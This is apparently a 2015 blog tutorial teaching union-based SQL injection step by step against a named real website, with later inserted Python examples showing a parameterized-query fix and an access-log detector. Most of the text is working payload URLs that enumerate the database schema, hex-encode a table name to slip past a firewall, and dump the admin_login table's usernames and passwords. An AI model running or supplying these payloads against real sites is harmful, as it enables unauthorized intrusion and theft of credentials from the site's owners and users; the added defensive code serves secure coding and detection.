Union-Based Simple SQL Injection
Lesson 1. Union-based simple SQL injection
Step 1. Find the injection point on any PHP site.
(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid= etc)
Like this site:- www.site.com/index.php?id=1
Step 2. After finding it, first check whether the site is vulnerable or not.
I have a site: http://bbss.com.pk/index.php?id=483
We will add a single quote (') after:- ?id=483
Like this:- http://bbss.com.pk/index.php?id=483'
Hit Enter.
Step 3. After adding the single quote ('), if the site shows some SQLi error or hides data on the page, this means it is vulnerable.
Step 4. Start the operation on the URL. Now we will count the total number of columns in information_schema.
We will use an ORDER BY query to count the columns.
Like this:- http://bbss.com.pk/index.php?id=483 order by 100--
I am putting -- to comment out the rest of the query.
It is showing an error, so the total number of columns is between 1 and 100.
Now I will decrease my column number.
Step 4.2. Now I select just the 20th column for sorting the site data.
Like this:- http://bbss.com.pk/index.php?id=483 order by 20--
Still an error.
Here the total number of columns is 11, because at 12 there is an error.
Step 5. Now I am going to use the UNION command to check for vulnerable columns.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,3,4,5,6,7,8,9,10,11--
Here UNION is combining both of the queries: the 1st one is the site's query and the 2nd is my SELECT query.
Here it is not printing the vulnerable columns because there is not sufficient free space to print them, so I will hide the site data by using the - sign before the id (id=-483).
Now here the vulnerable columns are 3 and 6.
Now we will fetch all the data using column numbers 3 and 6.
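Why Steps 2 to 5 work at all, and what stops them, shown as an added example (not code from the original post or from the site it describes). It assumes a constructed 3-column table `news` in an in-memory SQLite database as a stand-in for the site's MySQL table; the function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the site's table (SQLite in memory, 3 columns)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (483, 'Welcome', 'Page body')")
    return db

def page_vulnerable(db, raw_id):
    # Root cause of every step above: the id parameter is pasted into the SQL
    # text, and the database error is echoed back to the visitor.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc

def page_hardened(db, raw_id):
    # Allow-list the expected type, then bind the value so it is data, never SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Inputs taken from the steps above, shortened to this table's 3 columns.
PROBES = ["483", "483'", "483 order by 3--", "483 order by 4--",
          "-483 union select all 1,2,3--"]

def compare():
    """Run every probe through both handlers on the same database."""
    db = make_db()
    return [(p, page_vulnerable(db, p), page_hardened(db, p)) for p in PROBES]

if __name__ == "__main__":
    for probe, weak, strong in compare():
        print("%-32r vulnerable=%r hardened=%r" % (probe, weak, strong))
```

On the PHP/MySQL stack this page targets, the equivalent fix is a prepared statement (PDO or mysqli) with the id bound as an integer, plus a generic error page instead of the raw database message.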
Here are some commands for fetching data on the website:-
Variable/Function : Output
@@hostname : Current hostname
@@tmpdir : Temp directory
@@datadir : Data directory
@@version : Version of DB
@@basedir : Base directory
user() : Current user
database() : Current database
version() : Version
schema() : Current database
UUID() : System UUID key
current_user() : Current user
current_user : Current user
system_user() : Current system user
session_user() : Session user
@@GLOBAL.have_symlink : Check if symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it has SSL or not
Step 6. Now find the database name or version using the vulnerable columns.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,Database(),4,5,Version(),7,8,9,10,11--
You see on the website page:- Database is 'bbss_com_pk_db', version is '5.1.73-community'
Step 7. Now we will fetch table names.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables--
information_schema is the collection of databases; here we are fetching all table names from all databases.
Here there is only one table, but I want all the tables of information_schema, so I use group_concat() to group the tables.
Step 8. But I want table names only from the database, so now we will set a WHERE condition.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Now these are all the tables of the database.
Step 9. Now I am unable to see all the tables, so I will use the <br> tag to print the table names on separate lines.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,<br>),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Hit Enter. We are shown an error; we need to encode the <br> tag in 0x hex code: <br>=(0x3c62723e)
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Step 10. Now I fetch the table name 'Admin_login'.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=admin_login--
Oops, here is a firewall that blocks the table_name=admin_login fetching.
Now I will encrypt admin_login in mysql_char().
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e5f6c6f67696e--
We got the admin_login columns.
Step 11. Now I fetch the juicy data, that is, name and password.
Like this:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11 from admin_login--
In this step I use 0x3a to divide the name and password (:). And remember, don't forget to decrypt admin_login to normal text in the final step.
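Every stage of this lesson leaves a recognisable query string in the web server's access log. The detector below is an added example, not part of the original post: it assumes combined-format log lines, and the sample lines, IP addresses, rule names and function names are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# One signature per stage the lesson walks through (Steps 2 to 11).
RULES = {
    "stray_quote":    re.compile(r"=-?\d+'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*(--|#)"),
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum":    re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "group_concat":   re.compile(r"\bgroup_concat\s*\("),
    "hex_literal":    re.compile(r"\b0x[0-9a-f]{2,}\b"),
}
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) HTTP/[\d.]+" \d{3}')

# Constructed sample lines (documentation IP ranges, made-up timestamps).
T = "[01/Jan/2024:10:00:0%d +0000]"
SAMPLE_LOG = [
    '203.0.113.7 - - ' + T % 1 + ' "GET /index.php?id=483 HTTP/1.1" 200 5120',
    '192.0.2.44 - - ' + T % 2 + ' "GET /search.php?q=credit+union+hours HTTP/1.1" 200 900',
    '198.51.100.9 - - ' + T % 3 + ' "GET /index.php?id=483%27 HTTP/1.1" 200 310',
    '198.51.100.9 - - ' + T % 4 + ' "GET /index.php?id=483%20order%20by%20100-- HTTP/1.1" 200 310',
    '198.51.100.9 - - ' + T % 5 + ' "GET /index.php?id=-483%20union%20select%20all%201,2,'
    'group_concat(table_name,0x3c62723e),4,5,6,7,8,9,10,11%20from%20'
    'information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 5200',
]

def normalise(query):
    """URL-decode, collapse whitespace and lowercase before matching."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()

def scan(lines):
    """Return {client_ip: set of rule names matched in any query string}."""
    hits = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, target = m.groups()
        query = normalise(urlsplit(target).query)
        for name, rx in RULES.items():
            if rx.search(query):
                hits[ip].add(name)
    return dict(hits)

def suspects(lines, min_rules=2):
    """Clients that tripped several distinct stages, i.e. a probing sequence."""
    return sorted(ip for ip, names in scan(lines).items() if len(names) >= min_rules)
```

Requiring at least two distinct rules per client keeps a single odd query string from raising an alert, while the probing sequence from this lesson trips all six.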
Lesson No. 2:- Union-based SQLi with WAF bypass (coming soon…)
Reviewed by Unknown on 12/09/2015